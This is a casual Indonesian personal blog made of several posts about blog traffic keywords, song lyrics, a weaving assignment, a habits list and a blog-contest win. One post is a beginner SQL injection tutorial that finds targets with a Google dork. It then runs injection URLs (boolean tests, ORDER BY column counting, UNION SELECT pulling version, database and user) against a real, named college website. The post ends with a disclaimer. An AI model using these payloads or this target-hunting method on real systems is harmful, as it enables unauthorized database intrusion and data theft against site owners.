Keyword yang mengejutkan!

ya...gw ol lagi dan ada lagi disini, dengan niat mo ngambil file pelem Fast & Furious 4 di warnet deket rumah gw...ya, NGAMBIL...nggak donlod! xixixi....gratisan! lumayan lah...hehe

back to topic....postingan sebelum ini gw sempet bahas dapetin keyword yang sering dipake ma user buat tertarik masuk ke blog gw ini via feedjit secara manual (gaptek banget), akhirnya setelah ngulik alexa ternyata ada juga lho buat mengetahui hal ini...hahahaahaha (gw jujur baru tau...gaptek banget kan? xixixiix)

caranya masuk alexa.com....ketikin alamat blog ente....nah, ntar kan ada hasilnya tu rank-nya, nah..disitu klik tab "keywords" dan muncul deh....tampilan punya gw ni :



tuh...ada 2 yang perlu dicatet..pertama, rank alexa gw disitu udah dibawah 1 juta,,tapi widgget yang gw pasang ko masih diatas 1 juta ya??? aneh...

dan yang kedua yang paling aneh...KO BANYAK USER MASUK KE BLOG GW PAKE KEYWORDS "TEATZO"???? kenapa mesti teatzo??? jiakakakakakaka.....

tapi makasih dah buat teatzo...berkat dia blog gw jadi rada rame pengunjung..xixiixix!

udahan postinga ga jelas blog gw ini...

sekian, terima gajih!

5 top keywords for my blog

ya, ga ada kerjaan bikin gw ngepost hal yang ga da kerjaan juga. haha..ya kali ini gw pengen bahas tentang keyword! ya...gw penasaran, user tu masuk blog gw ini via google keyword-nya pake apaan aja sih? caranya gimana? pake cara sederhana aja dah....pake feedjit. ya, liat feedjit-nya dan liat mana aja yang halaman URL-nya via google, dan setelah survey beberapa hari gw dapet 5 top list keyword buat masuk blog gw ini :

1. "dasar sql injection"
2. "i wanna be the guy"
3. "friendster login"
4. "nyolong cookies"
5. "login friendster pake cookies"

hmm..berdasarkan survey 3 dari 5 berhubungan ma friendster? haha...masih ada aja yang maenan friendster. xiixixix....dah postingan jaman dulu banget tuh. hehe

mo coba juga? silakan aja...hehe

piss out, kurosystem

Apa itu SQL Injection?

dah lama ni ga ngepost tentang dunia perhitaman (?)

oke, walopun baru mempelajari dikit tentang SQL injection, saya pengen bahas + ngasih dikit tutor tentang ginian (alaaah...)
jadi maab kalo rada bingung baca post saya berikut...soalnya saya yang bikin juga bingung.jiakakakakak....

opo sih SQL injection teh?
hmm...SQL injection merupakan teknik eksploitasi database via remote, dgn menggunakan SQL Query (perintah2 sql) buat mengetahui data2 target...dan tujuan akhirnya DEFACE! huhu...(ga juga deng)
ya pokoknya intinya gitu dah...

terus, gimana cara ngecek SQL Injection pada sebuah web? (ngecek site yang Vulnerable)

yang paling sering dipake ato digunakan para SQL INJECTOR (baca : DEFACER...jiakakaka) adalah dgn menggunakan command "AND 1=1" dan "AND 1=2"
1. AND 1=1 (kondisi true)
2. AND 1=2 (kondisi false)

berhubung yang saya tau cuma cara ini ya tutor-nya pake ini aja ya..hehe

okeh, kita langsung coba cari target kita
umm, cari site indo aja dah....coba pake dork digoogle-nya : "berita.php?id="
ambil salah satu deh ya...

http://www.amikbalikpapan.ac.id/Berita.php?id=5

nah, coba tambahin command diatas tadi buat ngecek SQL Injection-nya...jadi gini

1. http://www.amikbalikpapan.ac.id/Berita.php?id=5 AND 1=1
2. http://www.amikbalikpapan.ac.id/Berita.php?id=5 AND 1=2

apa beda url 1 ma 2? gini...
dalam kondisi AND 1=1 (true),dgn command ini halaman sitenya tidak akan mengalami perubahan, nah kalo pake kondisi AND 1=2 (false) halaman sitenya pasti akan berubah, biasanya sih bakal muncul pesan error gitu...nah kalo ada errorr-nya gitu berarti site ntu bisa di-eksploitasi dengan pake SQL Injection.
umm..untuk command false, biasanya bisa pake penambahan ' pada akhir url...biar lebih gampang. contohnya kaya gini :

http://www.amikbalikpapan.ac.id/Berita.php?id=5'

Next...

gimana cara cari jumlah table database web yang akan exploitasi ma sql injection?

yang saya tau aja ya...biasanya pake command order by
angka dibelakang command order by merupakan jumlah table-nya, kita cari satu per satu...mulai dari angka 1 :D, contohnya gini...

http://www.amikbalikpapan.ac.id/Berita.php?id=5 ORDER BY 1--

setelah di enter ternyata ga ada perubahan ini artinya halamannya masih dalam kondisi true, itu tandanya table site ini lebih dari 1. blom dapet jumlah tepat table-nya kan? langsung coba aja angka 10

http://www.amikbalikpapan.ac.id/Berita.php?id=5 ORDER BY 10--

wew..setelah dienter,halamannya error a.k.a berubah, ini berati site dlm kondisi false! apa artinya? tadi ambil angka 1 true....angka 10 false, berati jumlah table site ini antara 1-10 toh? hehe..bener ga? langkah selanjutnya? cari satu persatu dari 8 angka sisanya! :D

dicoba2 akhirnya dapet ni "batas"-nya...

1. http://www.amikbalikpapan.ac.id/Berita.php?id=5 ORDER BY 5--
2. http://www.amikbalikpapan.ac.id/Berita.php?id=5 ORDER BY 6--

yang pake angka 5, kondisi site masih true...sedangkan pas kita coba naekin ke 6, berubah jadi false!
ini membuktikan kalo jumlah database site target adalah 5! kita coba ganti perintahnya jadi union select....

1. http://www.amikbalikpapan.ac.id/Berita.php?id=5 UNION SELECT 1,2,3,4,5--
2. http://www.amikbalikpapan.ac.id/Berita.php?id=5 UNION SELECT 1,2,3,4,5,6--

setelah dicoba 1 per satu, kondisi true pada URL pertama dan kondisi false pada URL kedua kan?
terbukti! hehe...

next....magic number!

magic number adalah angka2 yang keluar pada halaman site, angka2 ini dipake buat disusupi SQL Query (command2 SQL).
nah, trus gimana cara dapetin magic numbernya?
salah satu caranya dengan nambahin tanda - didepan angka setelah variabel. contoh diatas yaitu angka 5. [Berita.php?id=-5]

http://www.amikbalikpapan.ac.id/Berita.php?id=-5 UNION SELECT 1,2,3,4,5--

enter dah!

angka2 berapa ajah yang keluar pada halaman site?
ada angka 2, 3 dan 4 kan?
nah...jadi angka2 ini yang akan kita pakai untuk memasukkan SQL Query [perintah2 SQL], dan dimasukkan + digantikan pada url tabel URL dari union select! ngerti? langsung aja deh...hehe

umm...ni beberapa SQL Query yg bakal dipake dan kegunaannya...

version() --> menampilkan versi dari database target
database() --> menampilkan database yang berada dalam target
user() --> menampilkan user yang berada dalam target

nah, buat cari versi, database dan user dari target...tinggal kita masukin deh...
dari yang tadinya :

http://www.amikbalikpapan.ac.id/Berita.php?id=-5 UNION SELECT 1,2,3,4,5--

diganti jadi...

http://www.amikbalikpapan.ac.id/Berita.php?id=-5 UNION SELECT 1,version(),database(),user(),5--

ngerti ga perubahannya? jadi gini...
angka yang keluar dari halaman site target tadi kan 2,3 dan 4. nah, istilah kasarnya..disinilah celah yang terbuka buat nambahin SQL Query! buat mengetahui data yang kita inginkan.
jadi magic number yang udah dikeluarin tadi diganti dengan perintah2 SQL...begitu.

langkah selanjutnya? enter...dan liat apa yang ada disitu..hehe

ya...segitu aja beberapa dasar dari SQL Injection dari sayah, blom berani bikin tutor buat bener2 ngebuka data tabel,data user+pass target dan tentu ngedeface-nya...hehe, blom pinter!

NB : cuman sekedar pengetahuan aja...jgn dipake macem2...kalo anda2 nemu bugs sql ato yang laennya...segera beritahu admin...jgn maen deface sendiri! :D xiixixix....

moga berguna....tengkyu.
salam dangdut, kurosystem...

postingan yang rada serius...

umm...tiba2 pengen ngepost sebuah lirik dari lagu yang dinyanyiin Ipang. jarang2 lho gw suka ma musik indonesia kalo ga Rocket Rockers, Closehead ato Kuburan! hehe. Ehem serius...tapi kali ini beda...ya beda banget, lirik berikut kayanya menggambarkan gw banget lah, liriknya gw banget lah (saat ini...), check this out :


Ipang - Tak Ada Gantinya

Bagaimana ku bisa
Berpaling darimu
Sekian lama ku mencari
Separuh jiwaku

Ku mau menunggu
Tak pernah berhenti
Sampai suatu saat nanti
Kau kan menyadari

*
Ku ingin kau tahu
Takkan ada habisnya
Ku masih milikki cinta
Melebihi yang kau kira

Hanyalah senyummu
Yang menghapus rinduku
Telah lama tak ku jumpa
Menghilang dariku

Akan ku lakukan asal kau kembali
Ku tak sanggup sendiri lebih lama lagi

Back to *

Ku ingin kau tahu
Takkan ada habisnya
Ku masih milikki cinta
Melebihi yang kau kira

**
Ku ingin kau tahu
Kau tetap dihatiku
Ada yang harus kau mengerti
Kau takkan ada gantinya

Yang aku inginkan hanyalah
Dirimu bersamaku selamanya
Bantu aku pergi dari sepi
Yang ku rasa menyakitkan


aneh memang,,,tapi beneran...gw banget....

mo donlod lagunya? klik disini

ya ya ya....pas gw lagi ngepost postingan gw kali ini kayanya "KUROSYSTEM POL IN LOP MODE = ON"

ga tau kenapa...tiba2 aja gitu...
ada komen?

FUUH....terbebas dari jeratan anyaman!

huaaaaah....udah rada lama ni ga update blog. tapi skrang sempet2in lagi dah, mumpung rada "bebas". haha, liat aja judul postingannya! haha. ya, udah 3 minggu belakangan ini gw disibukkan oleh sebuah tugas maha lieur (red : pusing), ya, bikin anyaman reweave! Ga ngerti? sama...gw juga! xixiixix.....pokoknya bikin anyaman gitu deh...lieur. berikut dokumentasi gambar anyaman gw yang udah jadi sebelum diberikan ke dosen (lumayan lah..buat kenang2an).



NB : sori gambarnya jelek, biasalah dipoto ma soner w200i gw yg mang ga cocok buat poto2an. huhu

Susah banget cuy bikin anyaman bodoh kaya gitu..huhu, sedikit gambaran aja, ngerangkai 1 helai aja bisa ampe 10-15 menit, bayangin aja...itu lebih dari 100 helai! ntu kalo masuk mata kuliah beneran sks-nya udah ga keitung kali! sepanjang kuliah...kalo ente mampir ke kampus gw (ngapain juga mampir ke kampus gw, xixixiix...) sepanjang kampus ntu pemandangannya ga jauh dari pemandangan menganyam dari mahasiswa2 angkatan 2007. ga cewe ga cowo...menganyam semua, keren ga tuh! gw menamai ini sebagai "VIEW OF TEXTILE!" ato kalo diterjemahin : dilarang merokok. ga lah...

dan pemandangan bodoh ini juga mengakibatkan mahasiswa2 kimia tekstil (yang emang ga dikasih tugas ginian) pada geleng2 kepala dan ga sedikit juga yang gumam gini (kebetulan gw denger) :
hah? cowo2 pada nganyam? hare gene masih nganyam???

anjrot, denger hal tersebut ingin rasanya gw lempar kepala dia pake mesin pintal, apa daya gw ga kuat ngangkatnya...ngangkat kemoceng aja gw mesti mengerahkan segala tenaga yang luar biasa bodoh. gw juga kalo ga demi meraih nilai ga mau ngelakuin hal memalukan ini..huhu

dan kmren, tepatnya tanggal 9 mei 2009 jam 09.54 WIB gw dengan resmi terbebas dari jeratan anyaman! *ngangkat tangan ke atas, kepala ke atas + berjoget ala ace ventura yang baru beres nyelesein kasusnya* huaaaaah....beneran, asa bucat bisul! xixixixix.....

dan sekarang gw rada lega, tu tugas emang jadi beban gw minggu2 ini...dan alhamdulillah sekarang udah beres....usai...the end...sayonara....dilarang kentut (?)

***

dan dengan usainya pekerjaan nganyam gw yang udah gw ceritain barusan, gw bisa ngeblog lagi dan mulai mengedit edit blom kesayangan gw ini lagi. beberapa hari yang lalu gw sempet ngumumin kalo blog gw ini lagi direnovasi, dan selama 3 hari itu gw cuman sempet bongkar2 dikit XML-nya dan berusaha mencari template yang cocok ma kepribadian gw ini (ceilaaaah....), dan baru aja tadi gw nyelesein pengeditan file .xml + html blog gw ni,...dan beginilah jadinya. hehe, keren ga? kalo keren...kasi komentar anda disini, dan kalo ga keren silakan isi komentar anda disini juga. hehe

dan satu pengumuman penting lagi, dan akhirnya gw ga jadi "pindah rumah" ke WP!!! alasan?
KARENA UDAH PEWE "TINGGAL" DI BLOGSPOT. HEHEHEHEHE....

dan karena gw baru nyadar kalo baru aja gw memposting hal bodoh gw ini dengan mengawali 5 paragrap terakhir dengan selalu diawali kata "dan" gw bakal undur diri dulu bentar...ya, paling ga gw udah update blog gw lagi dan berharap alexa rank gw turun lagi setelah ditinggal beberapa hari. hehe

***

kabar laen, gw mo pindah alamat blog ini pake domain gratisan .co.cc! hehe
berikut list URL yang rencananya mo gw pake :

1. http://www.tulisankuro.co.cc
2. http://www.kurongeblog.co.cc
3. http://www.kurosystem.co.cc
4. http://www.coretankuro.co.cc
5. http://www.belomadaide.co.cc
6. http://www.blablabla.co.cc
7. httP://www.lupaalamatnya.co.cc


silakan voting deh, ato kalo ada ide buat URL laen silakan posting komen disini yah! :D

udahan dulu ya...mo jalan2 dulu di dunia luna maya + googling + blogwalking dolo....dadah

nantikan update-an blog gw selanjutnya, masih dichannel yang sama, dan di gelombang yang sama...babai!

10 bad habbit + hal yang gw benci!

okeh, gw bisa ol lagi nih dan berusaha meng-update blog sepi gw ini. huhu

agenda gw ol hari ini apa? nyicil PR blog yang udah nunggak!

okeh, langsung aja...

gw udah nunggak 3 PR bloging nih dari akhwat sayah...wah,gila 3 PR = 3 award! huhu...ngomong2 soal award, udah 2 bulan ini blog gw kebanjiran award dan jujur aja gw rada aneh...knapa blog bodoh gw ini bisa kebanjiran award? tanya kennnapa????

udah ah...langsung nyicil award dulu dah...
nama award-nya : "your blog is my inspiration"
syaratnya : buka aja link berikut

NB : baca dulu syaratnya baru baca tulisan2 bodoh dibawah ini ya..hehe

1. Lupa Nge-Charge batere HP!
yaa...ini kebiasaan paling bodoh yang sering banget gw lakuin. mungkin ini efek dari tidur kemaleman + bangun kesiangan yang sering gw lakuin akhir2 ini. hoho....terakhir kali gw bawa kuliah HP SE w200i kesayangan gw dengan batere nyisa 10% padahal kuliah dari pagi2 buta ampe jam setengah 3 siang. otomatis selama 10 jam itu gw ga nyetel mp3 di HP gw, padaha bawa headset. huhu

2. Males beres2 kamar!
yaaa begitulah. bagi2 anda yang melihat kamar gw sekarang ini diperkirakan dapat mengakibatkan katarak mendadak bagi yang melihatnya! hahaha...serius! kamar gw acak2an banget...seberantakan muka gw ini! huhu...alesan? KULIAH! ya...kuliah dijadiin alesan bwat gw ga beres2 kamar. gimana nggak....bangun kesiangan, kuliah pagi buta, pulang sore mulu ditambah kondisi badan gw yang akhir2 ini sering ngedrop. jadi ya kerjaan gw tiap senen - jumat kaya gitu, pulang masuk kamar..lempar tas kearah yang ga jelas, dan dengan indahnya tepar dipulau kapuk kamar gw tercinta!

3. Koneksi kartu "3" yang lemot
ya, gw pake kartu "3" akhir2 ini, karena penggunaan pulsa yang relatif murah banget! tapi koneksinya tu lho rada ga stabil. berdasarkan penelitian dan survey2 yang telah saya lakukan koneksi 3 rada lemot di antara jam 18.00 - 21.00, disaat itu pula gw sering smsan ma akhwat gw, dan terjadilah koneksi timbal balik yang ga jelas (baca : SMS), sering pending dan waaaah....pokoknya pusing dah!

4. Laporan Praktikum yang di reject dosen!
yaaaao...ga mo banyak komentar dah soal yang ini, udah susah2 bikin laporan praktikum...nyari referensi sana sini ampe ngerjain tengah malem, nyari dosennya yang keliling kampus ga jelas...eh, ditolak, yang kadang ditolak dengan alesan ga jelas. huh...

5. Lagi enak2 donlod file eh...DC
ga mo banyak komentar deh soal yang ini, bisa diterima oleh akal sehat kan? haha...

6. ASMA KUMAT!
ya, gw punya asma....dan kalo kumat bener ga enak banget dah. ganggu kuliah, ganggu temen dan ganggu kucing deket kostan temen gw (?). addduh....no hal2 yang berbau ES + GORENGAN lagi dah! tapi terakhir ga sengaja beli es campur depan kampus! hehe...

7. JAGUNG!
gw benci ma benda yang satu ini....terakhir makan jagung pas makan bareng akhwat gw di Pizza Hut, dan dia mesennya Pizza jagung gitu. haha...dengan terpaksa gw makan tu pizza jagung,,ya KEPAKSA! huhu...dengan niat memberi contoh bahwa tidak ada makanan yang boleh ditakuti...huhu, dan alhamdulilah sekarang udah ga begitu freak banget ma yang namanya jagung!

8. Kehilangan orang yang gw sayang!
untuk yang satu ini insya Allah bakal diceritain dilain waktu deh.

9. Orang sok pamer!
ya...temen gw ada yang kaya gini nih. dia sering pamerin spec kompie-nya yang emang tinggi bnget! dan dipamerin gitu aja lewat omongan2nya. ga mo banyak komentar dah...takutnya banyak kata2 yang bakal disensor ma gw sendiri! hahahaah...

10. Kantin Mahal dengan makanan yang ga enak!
cukup jelas kali ya...ga usah dijelasin lebih lanjut.

huuuuh....akhirnya beres juga PR-nya, masih nyisa 2 PR lagi...dikerjain ntar2 deh! huhu...cape!

tag award ini buat siapa ya?? ga mau repot ah....10 orang pertama yang komentar dipostingan gw ini berhak mendapat award ini tentu setelah dikerjain. lumayan lho....daripada ga ada ide buat ngeposting diblog? haahahahaha....

udah ah...smell u later!

Alhamdulilah menang uy...hehe

ehem, cek cek...testing! ehem...gud gud!

kurosystem yang baik hati dan tidak sombong ini akhirnya bisa ngeblog + update blog konyol-nya lagi! huhuhu.

hari ini tanggal 3 mei, ya 3 mei adalah hari pengumuman dari kompetisi blog fajarseraya.com! gw berencana buat OL pagi2 buta hari ini dan melihat apakah gw ada di list pemenang dari kompetisi blog ini. gw langsung ol buka YM, dan kebetulan si fajar (baca : empunya lomba blog) lagi ON YM-nya, dan pasang status : "pengumuman pemenang kompetisi blog fajarseraya", hmmm...ternyata pengumuman-nya udah diposting! tanpa ba-bi-bu lagi gw klik link yang dikasih ma status-nya itu! masuk blog-nya, masuk postingan pengumuman pemenang kompetisi blog-nya, dan gw cari nama gw ato nama blog gw disitu, gw cari2.... cari2... cari2... dan.... gw nemu nick name gw beserta alamat blog gw



haha...gw pemenang dengan kategori artikel terlucu? :D
hanya satu kata yang terlintas dibenak saya saat itu : ALHAMDULILLAH!

umm...sebenernya saya pengen hadiah domain sih, terserah domain apapun itu yang penting TLD! (top level domain) hehe. tapi berhubung dapetnya itu ya gpp, saya syukuri apa yang saya udah raih + seneng bnget bisa dapet hadiah pertama yang saya raih di kiprah saya selama didunia maya! *lebai*

saat itu juga gw pengen teriak :

GW : "MAMAAAAAH....ANAK-MU INI MENANG HOSTINGAN 1GB DI LOMBA BLOG FAJARSERAYA.COM!!!"

MAMAH : "haaah? hostingan tu apa? sapa tu fajar? ga ngerti...cepet sapu lantai sana!"

oh, tidak...apa daya saya malah disuruh nyapu lantai...

back to topik hidayat

tanpa ba-bi-bu lagi gw langsung hubungi si fajar yang kebetulan lagi ON YM-nya! gw banyak tanya soal hadiah yang baru gw dapet ini karena jujur...gw emang gaptek soal ginian. hehe

ya gw langsung disuruh order aja gitu ma si fajar di saranghosting.com (sekarang udah pindah ke saranghosting.net), akhirnya gw order aja....berikut buktinya *ceilahh..*



ya...langkah selanjutnya gw tinggal tunggu konfirmasi dari saranghosting.com..eh, dot net! hehehe...

dan sekarang ini gw bingung, tu hostingan mo dipake apa? *suara jangkrik*

sebenernya dengan hostingan ini gw ada ide buat "pindah rumah" ke WORDPRESS, karena katanya ngeblog di Wordpress (yang hostingan sendiri ntu) tu enak....cuman 1 masalahnya :

"GW GA BISA NGEBLOG + EDIT2 DI WORDPRESS HOSTINGAN SENDIRI!" (SERIUS!)

jadi kayanya sebelum gw pake tu hostingan gw bakal berguru2 dulu ma suhu2 sekaligus temen gw sesama bloggers. hehe...berikut list suhu2 WORDPRESSER yang bakal gw tanya2in soal berblog ria di wordpress! hehe :

1. Bang Fajarseraya (yang ngasi gw hadiah hostingan)

2. Kang Bamznyubi (yang sering mampir di blog gw)

3. Neng Cheuw (kayanya jago wordpress + naekin rank alexa. hehe)

4. .....sapa lagi ya? ada yang berminat ngajarin gw berblog ria di Wordpress?

kalo ada, silahkan komen dipostingan ini! SERIUS!!! (liat ampe pake 3 tanda seru,ini tandanya saya serius)

udah ah, binun ni mau ngapain lagi dadah...ditunggu lamarannya sebagai guru sayah....dibayar, ma ucapan terima kasih! :D